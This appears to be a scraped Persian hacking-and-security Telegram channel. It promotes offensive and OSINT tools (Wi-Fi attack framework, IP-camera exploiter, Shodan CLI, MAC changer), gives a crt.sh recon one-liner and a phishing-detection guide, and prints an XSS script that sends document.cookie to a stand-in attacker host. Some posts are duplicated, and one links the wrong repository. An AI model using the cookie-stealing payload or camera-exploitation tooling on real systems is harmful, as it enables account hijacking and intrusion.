This media is not supported in your browser
VIEW IN TELEGRAM
🔸یک پراکسی تمام ترافیک را دریافت میکند و آن را بین چندین سرور تقسیم میکند تا بار را متعادل کند.
🔹اما اختلال کلودفلر نشان داد: اگر خود پراکسی خراب شود، اصلاً مهم نیست چند سرور پشت آن دارید. یک پیکربندی نادرست و کل edge عملاً خودش را دچار حمله دیداس کرده است.
#هکینگ #امنیت #اطلاعات
🔹اما اختلال کلودفلر نشان داد: اگر خود پراکسی خراب شود، اصلاً مهم نیست چند سرور پشت آن دارید. یک پیکربندی نادرست و کل edge عملاً خودش را دچار حمله دیداس کرده است.
#هکینگ #امنیت #اطلاعات
🛡@ir_c_a
❤48👍22
💻 ؛LitterBox محیط ایزوله امن برای اجرای کد
🔸️؛LitterBox ابزاری است برای ایجاد محیطی ایزوله جهت اجرای امن کدهای غیرقابل اعتماد یا دلخواه.
🌐 لینک به گیتهاب
🔸️؛LitterBox ابزاری است برای ایجاد محیطی ایزوله جهت اجرای امن کدهای غیرقابل اعتماد یا دلخواه.
🌐 لینک به گیتهاب
🛡@ir_c_a
❤48
💻 ؛XSS — دزدیدن کوکی در یک ثانیه از طریق سایت دیگر
یک آسیبپذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنلهای مدیریت در سراسر جهان راه میدهد.
🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا میکند که <script> را فیلتر نمیکند. کد خود را در آن قرار میدهد. قربانی صفحه را باز میکند — کد اجرا میشود.
مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):
حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار میدهد — و بدون رمز عبور با حساب او وارد میشود.
🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)
یک آسیبپذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنلهای مدیریت در سراسر جهان راه میدهد.
🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا میکند که <script> را فیلتر نمیکند. کد خود را در آن قرار میدهد. قربانی صفحه را باز میکند — کد اجرا میشود.
مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):
<script>
fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>
حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار میدهد — و بدون رمز عبور با حساب او وارد میشود.
🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)
🛡@ir_c_a
❤44
🔸️؛WEF (چارچوب بهرهبرداری از وایفای) — چارچوبی برای ارزیابی امنیت و حملات به شبکههای وایفای
🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکههای بیسیم است. امکان انجام طیف گستردهای از حملات را فراهم میکند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهرهبرداری از آسیبپذیریهای WPS و رهگیری دستدادنهای WPA به صورت خودکار.
🌐 لینک گیتهاب
🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکههای بیسیم است. امکان انجام طیف گستردهای از حملات را فراهم میکند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهرهبرداری از آسیبپذیریهای WPS و رهگیری دستدادنهای WPA به صورت خودکار.
🌐 لینک گیتهاب
🛡@ir_c_a
🔥21❤11
🌐؛GeoVista سامانه عاملی استدلال بصری با افزونه وب برای موقعیتیابی دقیق جغرافیایی
🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عاملهای هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیتیابی جغرافیایی) با استفاده از استراتژیهای استدلال بصری و جستجوی خارجی طراحی شده است.
🔸️این پروژه مسائل پیچیده «جهتیابی بصری» را با تقلید از عملکرد یک کارشناس حل میکند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشمانداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده میکند.
📌لینک گیتهاب
https://github.com/BlackSnufkin/LitterBox
🛡@ir_c_a
🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عاملهای هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیتیابی جغرافیایی) با استفاده از استراتژیهای استدلال بصری و جستجوی خارجی طراحی شده است.
🔸️این پروژه مسائل پیچیده «جهتیابی بصری» را با تقلید از عملکرد یک کارشناس حل میکند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشمانداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده میکند.
📌لینک گیتهاب
https://github.com/BlackSnufkin/LitterBox
🛡@ir_c_a
👍12❤7
💻 ؛ShodanX — ابزار پیشرفته برای تعامل با API شادان و انجام OSINT
🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمعآوری مؤثر اطلاعات درباره دستگاههای متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.
🔺؛ShodanX کار با فیلترهای شادان را ساده میکند، از صادرات نتایج پشتیبانی میکند و به سرعت به کشف نقاط ورود احتمالی یا نشت دادهها در شبکه جهانی کمک میکند.
لینک به گیتهاب
🛡@ir_c_a
🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمعآوری مؤثر اطلاعات درباره دستگاههای متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.
🔺؛ShodanX کار با فیلترهای شادان را ساده میکند، از صادرات نتایج پشتیبانی میکند و به سرعت به کشف نقاط ورود احتمالی یا نشت دادهها در شبکه جهانی کمک میکند.
لینک به گیتهاب
🛡@ir_c_a
🔥10👍6
⚠️ ؛CamOver | ابزار شناسایی و تست نفوذ دوربینهای IP پذیر
آیا میدانید چقدر از دوربینهای مداربسته در شبکه بدون محافظت هستند؟ CamOver ابزاری تخصصی برای شناسایی و بررسی آسیبپذیریهای دوربینهای IP است. 🛡️🔍
🛠️ قابلیتهای اصلی:
🔹 اسکن هوشمند: شناسایی خودکار مدلهای آسیبپذیر از برندهای معروف (مانند Hikvision، TP-Link، CCTV و غیره).
🔹 بهرهبرداری خودکار: استفاده از آسیبپذیریهای عمومی و اطلاعات کاربری پیشفرض (Default Credentials).
🔹 دسترسی به استریم: توانایی دسترسی به جریان ویدیویی دوربینهای محافظتنشده.
🔹 انعطافپذیری بالا: پشتیبانی از اسکن تکهدف و اسکن گسترده کل زیرشبکه.
👨💻 مناسب برای: متخصصین امنیت، تستکنندههای نفوذ و کارشناسان شبکه.
📂 لینک مخزن در گیتهاب:
🔗 GitHub - CamOver
⚠️ توجه: این ابزار صرفاً جهت مقاصد آموزشی و تست امنیت تهیه شده است. استفاده غیرمجاز مسئولیت بر عهده کاربر است.
#امنیت_شبکه #تست_نفوذ #هک #دوربین_دوربین #سایبر_امنیت #CyberSecurity #EthicalHacking #CamOver #IPCamera
🛡@ir_c_a
آیا میدانید چقدر از دوربینهای مداربسته در شبکه بدون محافظت هستند؟ CamOver ابزاری تخصصی برای شناسایی و بررسی آسیبپذیریهای دوربینهای IP است. 🛡️🔍
🛠️ قابلیتهای اصلی:
🔹 اسکن هوشمند: شناسایی خودکار مدلهای آسیبپذیر از برندهای معروف (مانند Hikvision، TP-Link، CCTV و غیره).
🔹 بهرهبرداری خودکار: استفاده از آسیبپذیریهای عمومی و اطلاعات کاربری پیشفرض (Default Credentials).
🔹 دسترسی به استریم: توانایی دسترسی به جریان ویدیویی دوربینهای محافظتنشده.
🔹 انعطافپذیری بالا: پشتیبانی از اسکن تکهدف و اسکن گسترده کل زیرشبکه.
👨💻 مناسب برای: متخصصین امنیت، تستکنندههای نفوذ و کارشناسان شبکه.
📂 لینک مخزن در گیتهاب:
🔗 GitHub - CamOver
⚠️ توجه: این ابزار صرفاً جهت مقاصد آموزشی و تست امنیت تهیه شده است. استفاده غیرمجاز مسئولیت بر عهده کاربر است.
#امنیت_شبکه #تست_نفوذ #هک #دوربین_دوربین #سایبر_امنیت #CyberSecurity #EthicalHacking #CamOver #IPCamera
🛡@ir_c_a
❤11
💡 ترفند: پیدا کردن زیردامنه ها از طریق crt.sh بدون ایجاد سر و صدا
📌نمی خواهید اسکن فعال را آشکار کنید، و بررسی دستی زیردامنه، با یک دستور، تمام گواهینامه های SSL صادر شده برای یک دامنه در دسترس شما خواهد بود. crt.sh حتی زیردامنه هایی را می شناسد که در DNS ثبت نشده اند.
📌به سادگی
❌ توجه، در هنگام اجرای دستور VPN تون باید روشن باشه. ☑️
#ترفند #امنیت_شبکه #هک
🛡@ir_c_a
📌نمی خواهید اسکن فعال را آشکار کنید، و بررسی دستی زیردامنه، با یک دستور، تمام گواهینامه های SSL صادر شده برای یک دامنه در دسترس شما خواهد بود. crt.sh حتی زیردامنه هایی را می شناسد که در DNS ثبت نشده اند.
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
📌به سادگی
target.com را به جای مثال وارد کنید و پس از چند ثانیه، لیستی از تمام زیردامنه هایی که تا به حال در گواهینامه ها وجود داشته اند را مشاهده خواهید کرد. بدون نصب، بدون تنظیمات، و بدون هیچ ردی در لاگ های هدف.❌ توجه، در هنگام اجرای دستور VPN تون باید روشن باشه. ☑️
#ترفند #امنیت_شبکه #هک
🛡@ir_c_a
❤8
🔍 چگونه یک وبسایت اصلی را از یک تقلبی تشخیص دهیم و از وارد کردن رمز عبور به کلاهبرداران جلوگیری کنیم
شما یک لینک دریافت میکنید: сбер-онлайн.xyz یا g00gle.com. به نظر میرسد مشابه است، اما چیزی درست نیست. کلاهبرداران ظاهر وبسایتهای معروف را کپی میکنند، یک حرف در آدرس را تغییر میدهند و شما ناخواسته رمز عبور خود را در یک صفحه تقلبی وارد میکنید. به یاد داشته باشید. یک کلیک اشتباه میتواند منجر به از دست دادن حساب کاربری، پول و آرامش شما شود. در اینجا نحوه بررسی لینکها بدون ریسک آورده شده است.
لینک فیشینگ چیست؟
این یک آدرس است که خود را به عنوان یک آدرس واقعی جا میزند. به عنوان مثال:
- g00gle.com به جای google.com
- vk.com.secure-login.ru به جای vk.com
- сбер-банк.онлайн (دامنه نامعتبر)
هدف این است که شما را وادار به وارد کردن نام کاربری و رمز عبور در یک صفحه تقلبی کنند.
🛡 بررسی گام به گام لینک
1. روی لینک قرار دهید (در رایانه)
فقط موس را روی لینک ببرید - آدرس واقعی در پایین مرورگر ظاهر میشود. اگر یک دامنه عجیب و غریب مشاهده کردید، روی آن کلیک نکنید.
2. لینک را نگه دارید (در تلفن)
نگه داشتن طولانی مدت روی لینک در پیامرسان یا مرورگر، آدرس کامل آن را نشان میدهد. اگر مجموعهای بیمعنی از کاراکترها یا یک دامنه مشکوک مشاهده میکنید، وارد آن نشوید.
3. لینک کوتاه را باز کنید
لینکهایی مانند bit.ly/2x3kF آدرس نهایی را پنهان میکنند. از سرویسهای رمزگشایی استفاده کنید:
- Unshorten.it (آنلاین)
4. از طریق VirusTotal بررسی کنید
لینک را کپی کنید و در VirusTotal جایگذاری کنید. این وبسایت آن را با دهها آنتیویروس بررسی میکند و نشان میدهد که آیا در پایگاه داده منابع کلاهبرداری ثبت شده است یا خیر.
5. از طریق urlscan.io بررسی کنید
لینک را ارسال کنید. این سرویس به طور خودکار وبسایت را در یک محیط ایزوله باز میکند، یک اسکرینشات میگیرد، ریدایرکتها و درخواستهای شبکه را نشان میدهد. شما میبینید که لینک به کجا منتهی میشود، بدون اینکه خودتان آن را باز کنید.
اگر قبلاً روی لینک کلیک کردهاید چه باید کرد
1. هیچ داده ای وارد نکنید. تب را ببندید.
2. اگر رمز عبور را وارد کردهاید، فورا رمز عبور خود را در وبسایت اصلی تغییر دهید.
3. احراز هویت دو مرحلهای (2FA) را در تمام سرویسهای مهم فعال کنید.
🛡@ir_c_a
شما یک لینک دریافت میکنید: сбер-онлайн.xyz یا g00gle.com. به نظر میرسد مشابه است، اما چیزی درست نیست. کلاهبرداران ظاهر وبسایتهای معروف را کپی میکنند، یک حرف در آدرس را تغییر میدهند و شما ناخواسته رمز عبور خود را در یک صفحه تقلبی وارد میکنید. به یاد داشته باشید. یک کلیک اشتباه میتواند منجر به از دست دادن حساب کاربری، پول و آرامش شما شود. در اینجا نحوه بررسی لینکها بدون ریسک آورده شده است.
لینک فیشینگ چیست؟
این یک آدرس است که خود را به عنوان یک آدرس واقعی جا میزند. به عنوان مثال:
- g00gle.com به جای google.com
- vk.com.secure-login.ru به جای vk.com
- сбер-банк.онлайн (دامنه نامعتبر)
هدف این است که شما را وادار به وارد کردن نام کاربری و رمز عبور در یک صفحه تقلبی کنند.
🛡 بررسی گام به گام لینک
1. روی لینک قرار دهید (در رایانه)
فقط موس را روی لینک ببرید - آدرس واقعی در پایین مرورگر ظاهر میشود. اگر یک دامنه عجیب و غریب مشاهده کردید، روی آن کلیک نکنید.
2. لینک را نگه دارید (در تلفن)
نگه داشتن طولانی مدت روی لینک در پیامرسان یا مرورگر، آدرس کامل آن را نشان میدهد. اگر مجموعهای بیمعنی از کاراکترها یا یک دامنه مشکوک مشاهده میکنید، وارد آن نشوید.
3. لینک کوتاه را باز کنید
لینکهایی مانند bit.ly/2x3kF آدرس نهایی را پنهان میکنند. از سرویسهای رمزگشایی استفاده کنید:
- Unshorten.it (آنلاین)
4. از طریق VirusTotal بررسی کنید
لینک را کپی کنید و در VirusTotal جایگذاری کنید. این وبسایت آن را با دهها آنتیویروس بررسی میکند و نشان میدهد که آیا در پایگاه داده منابع کلاهبرداری ثبت شده است یا خیر.
5. از طریق urlscan.io بررسی کنید
لینک را ارسال کنید. این سرویس به طور خودکار وبسایت را در یک محیط ایزوله باز میکند، یک اسکرینشات میگیرد، ریدایرکتها و درخواستهای شبکه را نشان میدهد. شما میبینید که لینک به کجا منتهی میشود، بدون اینکه خودتان آن را باز کنید.
اگر قبلاً روی لینک کلیک کردهاید چه باید کرد
1. هیچ داده ای وارد نکنید. تب را ببندید.
2. اگر رمز عبور را وارد کردهاید، فورا رمز عبور خود را در وبسایت اصلی تغییر دهید.
3. احراز هویت دو مرحلهای (2FA) را در تمام سرویسهای مهم فعال کنید.
🛡@ir_c_a
❤7
✅ ؛Macchanger — ابزاری برای دستکاری آدرسهای MAC
🔶؛Macchanger ابزاری است برای مشاهده، تغییر و دستکاری آدرسهای MAC کارتهای شبکهای در سیستمهای لینوکس.
🔷این ابزار عملکردهای مختلفی را ارائه میدهد، مانند تغییر آدرس به گونهای که با یک سازنده خاص مطابقت داشته باشد، یا تصادفیسازی کامل آن.
🌐 لینک به GitHub
t.me/Hack4Man
🔶؛Macchanger ابزاری است برای مشاهده، تغییر و دستکاری آدرسهای MAC کارتهای شبکهای در سیستمهای لینوکس.
🔷این ابزار عملکردهای مختلفی را ارائه میدهد، مانند تغییر آدرس به گونهای که با یک سازنده خاص مطابقت داشته باشد، یا تصادفیسازی کامل آن.
🌐 لینک به GitHub
t.me/Hack4Man
❤5